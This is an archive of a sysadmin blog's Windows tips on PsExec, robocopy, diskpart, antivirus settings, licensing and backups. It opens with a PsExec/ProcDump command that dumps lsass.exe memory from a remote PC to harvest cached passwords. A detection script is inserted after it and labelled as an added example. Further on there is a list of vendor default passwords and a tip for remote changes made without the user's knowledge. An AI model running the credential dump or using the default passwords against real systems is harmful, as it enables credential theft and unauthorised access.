Category Archives: Software

Any software, just for easy download reference!

Obtaining local Passwords from Memory Dump

This outputs a memory dump of the Windows security sessions process (lsass.exe) in order to obtain passwords stored locally in cache. It can be run against a remote system to obtain password credential information, and requires “local administrator” rights on the remote PC being targeted.

Requires: PsExec & ProcDump

psexec \\computername -accepteula -s -c procdump -accepteula -ma -o lsass.exe \\server\logs\computername.log

Reference: https://cyberarms.wordpress.com/2015/03/16/grabbing-passwords-from-memory-using-procdump-and-mimikatz/
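
A defensive counterpart to the command above, as an added example that is not part of the original post: a small classifier for process-creation command lines (assumed to come from a source such as Windows event 4688 with command-line auditing, or Sysmon event 1) that flags a full memory dump (-ma) aimed at lsass.exe, whether it was launched through PsExec, and whether the dump is written to a network share. The function names, finding labels and sample lines are constructed for illustration.

```python
import re

PSEXEC = {"psexec", "psexec.exe", "psexec64.exe"}
LSASS = {"lsass", "lsass.exe"}

def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def switch(tok):
    """Lower-case switch name for -x or /x style arguments, else None."""
    return tok[1:].lower() if len(tok) > 1 and tok[0] in "-/" else None

def leaf(tok):
    """Last path component, lower-cased (procdump, lsass.exe, ...)."""
    return tok.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_share_path(tok):
    r"""True for \\host\share\..., false for a bare \\host PsExec target."""
    return tok.startswith("\\\\") and "\\" in tok[2:]

def classify(cmdline):
    """Return the list of findings for one process-creation command line."""
    toks = tokens(cmdline)
    leaves = {leaf(t) for t in toks}
    switches = {switch(t) for t in toks}
    # Keyed on the arguments (-ma plus lsass as target), not the tool's file name.
    if "ma" not in switches or not (leaves & LSASS):
        return []
    findings = ["lsass-full-dump"]
    if leaves & PSEXEC:
        findings.append("via-psexec")
    if any(is_share_path(t) for t in toks):
        findings.append("dump-to-network-share")
    return findings

# Constructed sample command lines; the first is the command shown above.
SAMPLES = [
    r"psexec \\computername -accepteula -s -c procdump -accepteula -ma -o lsass.exe \\server\logs\computername.log",
    r"procdump.exe /MA LSASS.EXE C:\Temp\out.dmp",
    r"procdump -ma w3wp.exe C:\dumps\w3wp.dmp",
    r"psexec \\PCNAME net share DATA /delete",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or "ok", "<-", line)
```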

Trend AV | Tools & Commands

Transferring Trend OfficeScan Client from One Trend Console to Another

\\TrendAV01.domain.com\ofcscan\Admin\Utility\IpXfer\ipxfer.exe -s TrendAV01.domain.com -m 1 -p 8080 -c 49831

Transferring Trend OfficeScan Client from One Trend Console to Another REMOTELY

Download PSEXEC and copy it to C:\Windows\System32

psexec \\LaptopName -u Domain\ADMUSER -p Passw0rd -i "\\TrendAV01.domain.com\Trend_Antivirus\Tools\TrendClientMove_x86.bat"

TrendClientMove_x86.bat

@ECHO OFF
REM Modifies Trend Update Policy Server to use TRENDAV01.domain.com
\\TrendAV01.domain.com\ofcscan\Admin\Utility\IpXfer\ipxfer.exe -s TrendAV01.domain.com -m 1 -p 8080 -c 49831
Echo Update is now Complete!
Echo Click to Close 
Pause

TrendClientMove_x64.bat

@ECHO OFF
REM Modifies Trend Update Policy Server to use TRENDAV01.domain.com
\\TrendAV01.domain.com\ofcscan\Admin\Utility\IpXfer\ipxfer.exe -s TrendAV01.domain.com -m 1 -p 8080 -c 49831
Echo Update is now Complete!
Echo Click to Close 
Pause

Resetting OfficeScan Password:

Reference: Reset Officescan Password

Trend Uninstall Tools:

Disable Java Update | Windows

The quickest solution to stop this annoying update prompt is to use this registry file, which modifies the “Update” DWORD.
This update prompt is even more annoying if the user does not have local administrator rights.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Update\Policy]

"EnableJavaUpdate"=dword:00000000
"EnableAutoUpdateCheck"=dword:00000000

Veeam Backup | Benchmarks

I’ve been using VMware Converter and Veeam Replication for a while now but still ask myself the question “How long will this take to migrate or P2V?”

Here are some results to help with the expected performance…

1 VM Move – Server to Server on LAN (1GBPS Switch)

1 VM Restore – Reverse Incremental Backup on iSCSI to Server on LAN (1GBPS Switch)

PSEXEC | Remove File Share Remotely

Sometimes it takes time to go and speak to a user and have them stop what they are doing so you can make a change or tweak on their PC/laptop, so I like to do this in the background remotely without their knowledge (Hey! I’m an admin, that’s what I do).

PSEXEC has become a good friend for doing this!
I usually dump the “psexec” exe in the c:\Windows\System32 folder so I don’t have to change CMD paths. (Remember you need to run CMD as the user with access to the remote system for this to work)

Remove Share Remotely:

psexec \\PCNAME net share <SHARENAME> /delete

Map Drive Remotely:

psexec \\PCNAME net use S: \\SERVER\SHARE

VMware | “You cannot use the vSphere Client to edit the settings”

After carrying out a re-install of ESXi 5.5 and attaching the VMs the “edit settings” are unavailable.

“You cannot use the vSphere Client to edit the settings of the virtual machines of version 10 or higher.

Use the vSphere Web Client to edit the settings of this virtual machine”

As vCenter wasn’t in place for this scenario, the workaround was to directly edit the VM’s .vmx file.

  1. Load vSphere Client
  2. Select VM: “Remove from Inventory”
  3. Select Storage: “Browse Datastore”
  4. Select VM Folder: Locate/Download “.vmx” file (approximately 3/4 KB)
  5. Edit in Notepad
  6. Modify virtualHW.version = "10" to virtualHW.version = "8"
  7. Upload “.vmx” file back to VM Folder
  8. Select “.vmx” and “Add to Inventory”
  9. VM should now be editable.

Formatting Device | “diskpart”

Formatting a USB Flash Drive using the “diskpart” utility:

Diskpart also resolves issues with formatting within Windows GUI:

Error: “Format Cannot Run because the volume is in use by another process” & “Will not format – unknown capacity”

CMD

diskpart
list volume
select volume X
clean
create partition primary
format fs=ntfs quick label=DATA
assign letter=X

SubInACL & iCACLS

SUBINACL (SubInACL.exe)

SubInACL is an alternative command line tool to iCACLS that enables administrators to obtain security information about files, registry keys, and services, and transfer this information from user to user, from local or global group to group, and from domain to domain.

iCACLS

iCACLS example of modifying file permissions:

@echo off
REM ** /T = Performs the operation on all specified files in the current directory and its subdirectories.
REM ** :F = Full Access
REM ** :M = Modify Access
REM ** 64-bit Windows has a "Program Files (x86)" folder, so branch on its presence.
if exist "C:\Program Files (x86)" goto 64
icacls "%ProgramFiles%\Folder" /inheritance:e /grant "MyDomain\Domain Users":M /T
goto next
:64
icacls "%ProgramFiles(x86)%\Folder" /inheritance:e /grant "MyDomain\Domain Users":M /T
:next
pause

Show “system uptime” single/multiple servers

“Show uptime of multiple computers” – Looking after multiple servers, I wanted to check which have rebooted and which require rebooting due to Windows updates. To interrogate multiple servers I can use the Sysinternals “PSTools”.

Multiple Servers: (Output to txt)

  1. Download PSInfo
  2. Install PSInfo to a chosen location i.e. c:\windows\system32
  3. cmd
psinfo uptime \\* > c:\ShowSystemUptimesReport.txt

uptime = Shows only uptime
\\* = Checks every PC on the local network

> c:\ShowSystemUptimesReport.txt = Outputs file to this location

Example:

psinfo uptime \\Server-DC1,Server-DC2 > c:\ShowSystemUptimesReport.txt

Single server: (without tools)

systeminfo | find "System Boot Time:"

HP Proliant Microserver | AMD RAIDXpert RAID Rebuild

I recently developed a few faults with Windows Server 2008 R2 install running on my HP Proliant Microserver.
A number of posts and articles suggested the fault may be the result of a faulty HDD, therefore I ran a series of disk checks and applications to verify. Unable to locate any faults, I opted to remove both 2TB HDDs (configured in RAID1) so that I could dock them in another workstation and run through some more thorough checks.
Strangely, as a result of removing the HDDs the Windows “BSOD” and crashing did stop, however I was still unable to locate any errors on the HDDs.

Rather than installing both HDDs back in the system, I thought it best to only reinstall one HDD in order to fault find, therefore breaking the RAID. Once happy that the fault was corrected (never found out the issue) I started the RAID1 rebuild process using the following steps.

Robocopy (FileServer Migration)

I often use Robocopy when migrating/copying data from file servers.

When running the copy process to transfer data from Windows Server 2003 to Windows Server 2008, I usually run robocopy from the destination server (usually the newer server) so that it uses version XP027 (5.1.10). There are a number of flaws in XP026, and it also requires a separate download of the Windows 2003 Resource Kit to obtain it.

This is the main syntax I use to perform a full copy.

robocopy D:\Source E:\Destination /MIR /R:1 /W:1 /COPYALL

Example, when copying from another server (using UNC):

robocopy \\myserver\e$\data E:\data /MIR /R:1 /W:1 /COPYALL

Although “/MIR” is mirroring the data, this will not actually copy the ACL permissions, therefore you will need to ensure that /COPYALL is included. I’ve copied a whole load of data before without including this only to find I have had to recopy to correct the ACL.

/COPYALL : Copy ALL file info (equivalent to /COPY:DATSOU) including timestamps, permissions, ACL, other attributes.
/MIR : MIRror a directory tree – equivalent to /PURGE plus all subfolders (/E)
/R:n : Number of Retries on failed copies – default is 1 million.
/W:n : Wait time between retries – default is 30 seconds.

Sometimes the copy may set the top level folder to “hidden”. This can be un-hidden using the “attrib” command:

attrib -h -s E:\data

-s : Removes the system file attribute.
-h : Removes the hidden file attribute.


Yamaha RX-V671 | “PCM” Output

I own a Yamaha RX-V671 Amp which my media PC is connected to via HDMI. One of the issues I get is that when playing audio via the HDMI output, the Yamaha amp display shows “PCM” when I need this to display “Dolby Digital” or “DTS”.

In layman’s terms Pulse Code Modulation (PCM) is a digital scheme for transmitting analog data. Basically this means that the media PC converts the audio into digital and sends this to the amp to output. My objective is for the media PC to output the audio in the original format and let the amp do the processing (whereby this should display “Dolby Digital” or “DTS” etc.).

One of the main methods for playing Videos on the Media PC is by using Kazaa Codec Pack and Media Player included with the install. A quick way to install this is by using www.ninite.com and selecting “Kazaa Codec” pack.

When playing video/audio through Media Player Classic, the default installation will output audio via PCM. To correct this, you need to modify the “output” settings in the “FFDShow Audio Decoder Configuration” and enable the “Pass-through” options. The FFDShow icon will display in the taskbar when you play content using it.

Windows & Office Key Activation / Removal

Windows Keys (slmgr):

Change Windows Product Key & Activate:

cmd
slmgr -ipk your-mak-key-here
slmgr -ato

Office Keys (ospp.vbs):

In order to deactivate an Office license you can use the “ospp.vbs” script located in the Office 2010 Installation directory.

This allows for a number of functions, my objective being the deactivation of an activated MAK for Visio & Office 2010.

These are the steps taken for this scenario:

CD C:\Program Files\Microsoft Office\Office14

or

CD C:\Program Files (x86)\Microsoft Office\Office14

(32-bit Office 2010 on a 64-bit OS)

Display a list of the Office product keys installed and make a note of the last 5 characters of the key to be removed:

cscript ospp.vbs /dstatus

Remove Office Product key activation:

cscript ospp.vbs /unpkey:M9TKQ

HP Proliant Microserver | AMD RAIDXpert Software Download Link

Please can someone tell me WHY is it so HARD to find the DOWNLOAD for “AMD RAIDXpert” ? Makes me so frustrated when you know the software you need (it’s free) but there are so many links and hoops to jump through in order to download it!

As of December 2014 this is a valid link for the “AMD RAIDXpert v3.3.1540.19” direct from AMD (Release Date: 3/28/2012). The AMD RAIDXpert utility gives you complete control of your RAID arrays within a simple web browser based application. This tool allows you to monitor and manage your RAID arrays in the Microsoft Windows environment or via remote login to your system.

Here is the latest direct AMD RAIDXpert Utility URL for the AMD SB7xx/SB8xx Chipset:


RAIDXpert information:

The RAIDXpert Utility isn’t listed on the HP Microserver driver page (http://goo.gl/utZgj) for Windows Server 2008 R2 (even if you do log in). When I contacted HP to obtain this software I was told that it was not supported on the HP Proliant Microserver and that I would need to contact the software vendor (AMD) to get hold of the download. I’ve been given some dodgy advice from HP before, so I rang back a 2nd time to confirm, again being told that the AMD RAIDXpert utility was not supported on the Microserver or any HP 100 series and that no downloads were available or listed on the HP website. But then I stumbled on this link, which would completely contradict the information I was provided by HP…

HP ProLiant Microserver – How to Configure AMD RAIDXpert for E-mail Notifications: http://goo.gl/gjQKr (article ID: c03143514)


Software Notes:
AMD RAIDXpert Utility Info:

  • URL: http://localhost:25902/amd/screen.jsp
  • Default Username: admin
  • Default Password: admin

Locating hardware serial number in Windows:

  1. HP Serial number finder or wmic bios get serialnumber

WBAdmin | Daily Backup and Restore via Schedule

I’ve been working with the Windows backup. One downside of this in Windows 2008 is that you can’t schedule a routine backup job to a network device. A workaround is to use a scheduled task and the WBAdmin tool.

Scheduled Task: (Create a scheduled task and use the following switches)

wbadmin start backup -backuptarget:\\server\backup$\ -vssFull -allCritical -quiet

This command will back up the entire drive including a system image. I don’t think the “allCritical” switch will work if you then specify items to exclude.

Show Backups Running:

Wbadmin get status

Full list of switches: cc742083


Sophos Autoupdate (Greyed out)

The Sophos update settings are greyed out when a domain policy is in place. This is a problem when testing settings and debugging…

Settings can be changed by editing the iconn.cfg file:

  • Windows 7: C:\ProgramData\Sophos\AutoUpdate\Config\
  • Windows XP: C:\Program files\Sophos\AutoUpdate\Config\

Open iconn.cfg and change “AllowLocalConfig = 0” to “AllowLocalConfig = 1”

[PPI.WebConfig_Primary]
AllowLocalConfig = 0
AutoDialTimeout =
LocalPath =
DownloadGranularity =
ConnectionAddress = \\SERVERNAME\SophosUpdate\CIDs\S000\SAVSCFXP\
PortNumber =
UserName = domain\AVUpdate
UserPassword = ********************
ConnectionType = UNC

Just a tip for other Sophos issues: you can check connectivity to Sophos by confirming the following links work:

http://dci.sophosupd.com/
http://d1.sophosupd.com/
http://d2.sophosupd.com/
http://d1.sophosupd.net/
http://d2.sophosupd.net/

Default Passwords

AMD RAIDXpert

  • Username: admin
  • Password: admin
  • http://localhost:25902/amd/screen.jsp

APC UPS:

  • Username: apc
  • Password: apc

Draytek:

  • Username: <blank>
  • Password: admin

HP Proliant DL160 – Windows Storage Server 2003

  • Username: administrator
  • Password: hpinvent

HP Proliant Integrated Lights-Out (iLO)

  • Username: administrator
  • Password:

IBM Management Module Interface (MMI)

  • Username: USERID
  • Password: PASSW0RD
  • Default IP: DHCP then 192.168.70.125 255.255.255.0

IBM Raid Manager

  • Username: administrator
  • Password: <blank>

SCANPST.EXE Tool Location (PST recovery)

Looking for the ScanPST tool bundled with Microsoft Office?

Try the following locations:

SCANPST.EXE

  • disk drive:\Program Files\Microsoft Office\OFFICE12
  • disk drive:\Program Files\Common Files\System\Mapi\1033\
  • disk drive:\Program Files\Common Files\System\Mapi\1033\NT
  • disk drive:\Program Files\Common Files\System\MSMAPI\1033
  • disk drive:\Program Files (x86)\Microsoft Office\Office12
  • disk drive:\Program Files (x86)\Common Files\System\Mapi\1033\
  • disk drive:\Program Files (x86)\Common Files\System\MSMAPI\1033

If not, download it from: http://www.edwardsd.co.uk/work/storage/tools/